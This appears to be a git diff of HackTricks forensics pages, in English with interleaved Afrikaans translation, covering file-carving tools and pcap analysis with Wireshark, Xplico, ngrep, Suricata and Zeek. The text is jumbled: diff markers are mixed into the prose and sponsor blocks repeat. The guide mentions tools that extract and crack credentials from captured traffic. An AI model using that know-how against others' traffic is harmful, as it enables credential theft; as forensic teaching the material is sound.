Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting (URL's, domeine, IP's, MAC's, e-posse)** en meer **lêers**. Jy hoef net te doen:
```
bulk_extractor memory.img -o out_folder
```
Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**).
Navigeer deur **alle inligting** wat die instrument ingesamel het (wagwoorde?), **analiseer** die **pakkies** (lees [**Pcaps-analise**](../pcap-inspection/)), soek na **vreemde domeine** (domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande** domeine).
## PhotoRec
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk\_Download)
It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for.
Dit kom met GUI- en CLI-weergawes. Jy kan die **lêertipes** kies wat PhotoRec moet soek.
![](<../../../.gitbook/assets/image (524).png>)
## binvis
Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/).
Kyk na die [kode](https://code.google.com/archive/p/binvis/) en die [webwerf-instrument](https://binvis.io/#/).
### Features of BinVis
### Kenmerke van BinVis
* Visual and active **structure viewer**
* Multiple plots for different focus points
* Focusing on portions of a sample
* **Seeing stings and resources**, in PE or ELF executables e. g.
* Getting **patterns** for cryptanalysis on files
* **Spotting** packer or encoder algorithms
* **Identify** Steganography by patterns
* **Visual** binary-diffing
* Visuele en aktiewe **struktuurkyker**
* Verskeie grafieke vir verskillende fokuspunte
* Fokus op dele van 'n monster
* **Sien reekse en hulpbronne**, in PE- of ELF-uitvoerbare lêers, byvoorbeeld
* Kry **patrone** vir kripto-analise van lêers
* **Opmerk** verpakker- of enkodeeralgoritmes
* **Identifiseer** steganografie deur patrone
* **Visuele** binêre verskil
BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario.
BinVis is 'n goeie **beginpunt om bekend te raak met 'n onbekende teiken** in 'n swart-boks scenario.
# Specific Data Carving Tools
# Spesifieke Data Carving-instrumente
## FindAES
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word.
Download [here](https://sourceforge.net/projects/findaes/).
Laai dit hier af: [here](https://sourceforge.net/projects/findaes/).
# Complementary tools
# Aanvullende instrumente
You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\
You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien.\
Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te skakel na teks en dit te lees.
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

76
forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md
View file

@ -1,105 +1,93 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
# Carving tools
# Uitsnygereedskap
## Autopsy
The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files.
Die mees algemene gereedskap wat in forensika gebruik word om lêers uit beelde te onttrek, is [**Autopsy**](https://www.autopsy.com/download/). Laai dit af, installeer dit en laat dit die lêer inneem om "verborge" lêers te vind. Let daarop dat Autopsy gebou is om skyfbeelds en ander soorte beelde te ondersteun, maar nie eenvoudige lêers nie.
## Binwalk <a id="binwalk"></a>
**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data.
It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.
**Useful commands**:
**Binwalk** is 'n gereedskap om binêre lêers soos beelde en klanklêers te soek vir ingebedde lêers en data.
Dit kan geïnstalleer word met `apt`, maar die [bron](https://github.com/ReFirmLabs/binwalk) kan op GitHub gevind word.
**Nuttige opdragte**:
```bash
sudo apt install binwalk #Insllation
binwalk file #Displays the embedded data in the given file
binwalk -e file #Displays and extracts some files from the given file
binwalk --dd ".*" file #Displays and extracts all files from the given file
```
## Foremost
Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types.
'n Ander algemene instrument om verskuilde lêers te vind is **foremost**. Jy kan die opsetlêer van foremost in `/etc/foremost.conf` vind. As jy net wil soek na sekere spesifieke lêers, verwyder die kommentaarmerke. As jy niks verwyder nie, sal foremost soek na sy verstek geconfigureerde lêertipes.
```bash
sudo apt-get install foremost
foremost -v -i file.img -o output
#Discovered files will appear inside the folder "output"
```
## **Scalpel**
**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract.
**Scalpel** is nog 'n instrument wat gebruik kan word om **lêers wat in 'n lêer ingebed is** te vind en te onttrek. In hierdie geval moet jy die lêertipes wat jy wil onttrek, ontkommentarieer uit die konfigurasie-lêer (_/etc/scalpel/scalpel.conf_).
```bash
sudo apt-get install scalpel
scalpel file.img -o output
```
## Bulk Extractor
This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do:
Hierdie instrument kom binne kali, maar jy kan dit hier vind: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
Hierdie instrument kan 'n beeld skandeer en sal **pcaps onttrek** binne dit, **netwerkinligting\(URL's, domeine, IP's, MAC's, e-posse\)** en meer **lêers**. Jy hoef net die volgende te doen:
```text
bulk_extractor memory.img -o out_folder
```
Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\).
Navigeer deur **alle inligting** wat die instrument ingesamel het \(wagwoorde?\), **analiseer** die **pakkies** \(lees [**Pcaps-analise**](../pcap-inspection/)\), soek na **vreemde domeine** \(domeine wat verband hou met **kwaadwillige sagteware** of **nie-bestaande**\).
## PhotoRec
You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
Jy kan dit vind by [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)
It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for.
Dit kom met 'n GUI- en CLI-weergawe. Jy kan die **lêertipes** kies wat PhotoRec moet soek.
![](../../../.gitbook/assets/image%20%28524%29.png)
# Specific Data Carving Tools
# Spesifieke Data Carving-instrumente
## FindAES
Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker.
Soek na AES-sleutels deur te soek na hul sleutelskedules. In staat om 128, 192 en 256 bit sleutels te vind, soos dié wat deur TrueCrypt en BitLocker gebruik word.
Download [here](https://sourceforge.net/projects/findaes/).
Laai [hier af](https://sourceforge.net/projects/findaes/).
# Complementary tools
# Aanvullende instrumente
You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal.
You can use the linux command line tool **pdftotext** to transform a pdf into text and read it.
Jy kan [**viu** ](https://github.com/atanunq/viu)gebruik om beelde vanuit die terminaal te sien.
Jy kan die Linux-opdraglyn-instrument **pdftotext** gebruik om 'n pdf in te omskep na teks en dit te lees.
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>

205
forensics/basic-forensic-methodology/pcap-inspection/README.md
View file

@ -1,158 +1,189 @@
# Pcap Inspection
# Pcap Inspeksie
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
{% hint style="info" %}
A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools.
'n Nota oor **PCAP** vs **PCAPNG**: daar is twee weergawes van die PCAP-lêerformaat; **PCAPNG is nuwer en nie deur alle gereedskap ondersteun nie**. Jy mag 'n lêer van PCAPNG na PCAP moet omskakel deur Wireshark of 'n ander kompatibele gereedskap te gebruik, om daarmee te werk in ander gereedskap.
{% endhint %}
## Online tools for pcaps
## Aanlyn gereedskap vir pcaps
* If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com)
* Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
* As die kop van jou pcap **beskadig** is, moet jy probeer om dit te **herstel** deur gebruik te maak van: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
* Onttrek **inligting** en soek na **kwaadwillige sagteware** binne 'n pcap in [**PacketTotal**](https://packettotal.com)
* Soek na **skadelike aktiwiteit** deur gebruik te maak van [**www.virustotal.com**](https://www.virustotal.com) en [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com)
## Extract Information
## Onttrek Inligting
The following tools are useful to extract statistics, files, etc.
Die volgende gereedskap is nuttig om statistieke, lêers, ens. te onttrek.
### Wireshark
{% hint style="info" %}
**If you are going to analyze a PCAP you basically must to know how to use Wireshark**
**As jy 'n PCAP gaan analiseer, moet jy basies weet hoe om Wireshark te gebruik**
{% endhint %}
You can find some Wireshark tricks in:
Jy kan 'n paar Wireshark-truuks vind in:
{% content-ref url="wireshark-tricks.md" %}
[wireshark-tricks.md](wireshark-tricks.md)
{% endcontent-ref %}
### Xplico Framework
### Xplico-raamwerk
[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
**Install**
[**Xplico** ](https://github.com/xplico/xplico)_(slegs Linux)_ kan 'n **pcap** analiseer en inligting daaruit onttrek. Byvoorbeeld, van 'n pcap-lêer onttrek Xplico elke e-pos (POP, IMAP en SMTP-protokolle), alle HTTP-inhoud, elke VoIP-oproep (SIP), FTP, TFTP, en so aan.
**Installeer**
```bash
sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list'
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE
sudo apt-get update
sudo apt-get install xplico
```
**Run**
**Voer uit**
```
/etc/init.d/apache2 restart
/etc/init.d/xplico start
```
Kry toegang tot _**127.0.0.1:9876**_ met geloofsbriewe _**xplico:xplico**_
Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_
Then create a **new case**, create a **new session** inside the case and **upload the pcap** file.
Skep dan 'n **nuwe saak**, skep 'n **nuwe sessie** binne die saak en **laai die pcap-lêer op**.
### NetworkMiner
Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\
This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way.
Soos Xplico is dit 'n instrument om **analiseer en voorwerpe uit pcaps te onttrek**. Dit het 'n gratis uitgawe wat jy kan **aflaai** [**hier**](https://www.netresec.com/?page=NetworkMiner). Dit werk met **Windows**.\
Hierdie instrument is ook nuttig om **ander inligting geanaliseer** uit die pakkies te kry om te kan weet wat in 'n **vinniger** manier gebeur het.
### NetWitness Investigator
You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\
This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**.
Jy kan [**NetWitness Investigator hier aflaai**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Dit werk in Windows)**.\
Dit is 'n ander nuttige instrument wat die pakkies **analiseer** en die inligting op 'n nuttige manier **sorteer om te weet wat binne gebeur**.
### [BruteShark](https://github.com/odedshimon/BruteShark)
* Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...)
* Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* Build a visual network diagram (Network nodes & users)
* Extract DNS queries
* Reconstruct all TCP & UDP Sessions
* File Carving
* Uitpak en enkode gebruikersname en wagwoorde (HTTP, FTP, Telnet, IMAP, SMTP...)
* Onttrek verifikasiehasings en kraak hulle met behulp van Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...)
* Bou 'n visuele netwerkdiagram (Netwerknodes & gebruikers)
* Onttrek DNS-navrae
* Herkonstrueer alle TCP- en UDP-sessies
* Lêer uitsnyding
### Capinfos
```
capinfos capture.pcap
```
### Ngrep
If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters:
As jy **iets** binne die pcap soek, kan jy **ngrep** gebruik. Hier is 'n voorbeeld wat die hooffilters gebruik:
```bash
ngrep -I file.pcap 'filter'
```
Die `-I` vlag dui aan dat die bron 'n lêer is, en `file.pcap` is die naam van die pcap-lêer wat jy wil ondersoek. Die `'filter'` argument is die soekfilter wat jy wil gebruik om spesifieke data te vind binne die pcap-lêer.
Hier is 'n paar voorbeelde van ngrep-filters wat jy kan gebruik:
- `tcp` - Soek na TCP-verbindings.
- `udp` - Soek na UDP-verbindings.
- `port 80` - Soek na verbindings op poort 80.
- `host 192.168.1.1` - Soek na verbindings na die IP-adres 192.168.1.1.
- `src host 192.168.1.1` - Soek na verbindings waarvan die bron-IP-adres 192.168.1.1 is.
- `dst host 192.168.1.1` - Soek na verbindings waarvan die bestemmings-IP-adres 192.168.1.1 is.
Jy kan ook meer komplekse filters gebruik deur logiese operatore soos `and`, `or` en `not` te gebruik. Byvoorbeeld:
- `tcp and port 80` - Soek na TCP-verbindings op poort 80.
- `udp or port 53` - Soek na UDP-verbindings of verbindings op poort 53.
- `not host 192.168.1.1` - Soek na verbindings wat nie na die IP-adres 192.168.1.1 gaan nie.
Met ngrep kan jy spesifieke data binne die pcap-lêer vind deur die filters te gebruik wat die beste by jou ondersoek pas.
```bash
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
```
### Uithol
### Carving
Using common carving techniques can be useful to extract files and information from the pcap:
Die gebruik van algemene uitholtegnieke kan nuttig wees om lêers en inligting uit die pcap te onttrek:
{% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %}
### Capturing credentials
### Vang van geloofsbriewe
You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface.
Jy kan gereedskap soos [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) gebruik om geloofsbriewe uit 'n pcap of 'n lewendige koppelvlak te ontled.
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline.
{% embed url="https://www.rootedcon.com/" %}
## Check Exploits/Malware
## Kontroleer Uitbuitings/Malware
### Suricata
**Install and setup**
**Installeer en stel op**
```
apt-get install suricata
apt-get install oinkmaster
echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf
oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules
```
**Kyk na pcap**
**Check pcap**
Om 'n pcap-lêer te ondersoek, kan jy die volgende stappe volg:
1. **Identifiseer die doel van die ondersoek**: Bepaal wat jy probeer vind of bewys in die pcap-lêer.
2. **Installeer 'n pcap-analisehulpmiddel**: Gebruik 'n geskikte hulpmiddel soos Wireshark om die pcap-lêer te ontleed en te ondersoek.
3. **Analiseer die netwerkverkeer**: Bestudeer die verskillende netwerkverbindings en -protokolle in die pcap-lêer. Identifiseer verdagte aktiwiteite, ongewone patrone of enige ander potensiële aanwysers van 'n aanval.
4. **Identifiseer die bronne en bestemmings**: Kyk na die bron- en bestemmings-IP-adresse en -poorte om te bepaal watter entiteite betrokke is by die kommunikasie. Identifiseer enige onbekende of verdagte bronne of bestemmings.
5. **Ondersoek die inhoud van die kommunikasie**: Ontleed die inhoud van die kommunikasie in die pcap-lêer. Kyk na die datastrome, HTTP-aanvrae, e-posse, enige gevoelige inligting of enige ander relevante inligting wat kan help om die aard van die aanval of die kommunikasie te bepaal.
6. **Volg die tydlyn**: Analiseer die tydlyn van die netwerkverkeer om die volgorde van gebeure te bepaal en om te sien of daar enige tydgebaseerde patrone of verdagte aktiwiteite is.
7. **Identifiseer enige verdagte aktiwiteite**: Let op enige verdagte aktiwiteite, soos ongewone poorte, onbekende protokolle, ongewone datastrome, onverwagte kommunikasiepatrone, of enige ander afwykings van normale netwerkgedrag.
8. **Verkry aanvullende inligting**: Indien nodig, gebruik ander tegnieke soos DNS-navrae, WHOIS-opsoek, IP-adresopsporing, of enige ander relevante inligting om verdere konteks te verkry oor die bronne of bestemmings in die pcap-lêer.
9. **Stel 'n verslag op**: Maak 'n gedetailleerde verslag van jou bevindinge, insluitend enige verdagte aktiwiteite, potensiële aanwysers van 'n aanval, en enige ander relevante inligting.
```
suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
```
### YaraPcap
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is 'n instrument wat
* Reads a PCAP File and Extracts Http Streams.
* gzip deflates any compressed streams
* Scans every file with yara
* Writes a report.txt
* Optionally saves matching files to a Dir
* 'n PCAP-lêer lees en HTTP-strome onttrek.
* gzip defleer enige gekomprimeerde strome
* Skandeer elke lêer met yara
* Skryf 'n report.txt
* Opsioneel stoor ooreenstemmende lêers in 'n gids
### Malware Analysis
### Malware-analise
Check if you can find any fingerprint of a known malware:
Kyk of jy enige vingerafdruk van 'n bekende malware kan vind:
{% content-ref url="../malware-analysis.md" %}
[malware-analysis.md](../malware-analysis.md)
@ -160,12 +191,11 @@ Check if you can find any fingerprint of a known malware:
## Zeek
> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting.
> [Zeek](https://docs.zeek.org/en/master/about.html) is 'n passiewe, oopbron-netwerkverkeerontleder. Baie operateurs gebruik Zeek as 'n Netwerksekuriteitsmonitor (NSM) om ondersoeke na verdagte of skadelike aktiwiteit te ondersteun. Zeek ondersteun ook 'n wye reeks verkeersontledingsopdragte buite die sekuriteitsdomein, insluitend prestasiemeting en foutopsporing.
Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are.
### Connections Info
Basies is logboeke wat deur `zeek` geskep word nie **pcaps** nie. Jy sal dus **ander instrumente** moet gebruik om die logboeke waar die **inligting** oor die pcaps is, te analiseer.
### Verbindingsinligting
```bash
#Get info about longest connections (add "grep udp" to see only udp traffic)
#The longest connection might be of malware (constant reverse shell?)
@ -215,9 +245,35 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top
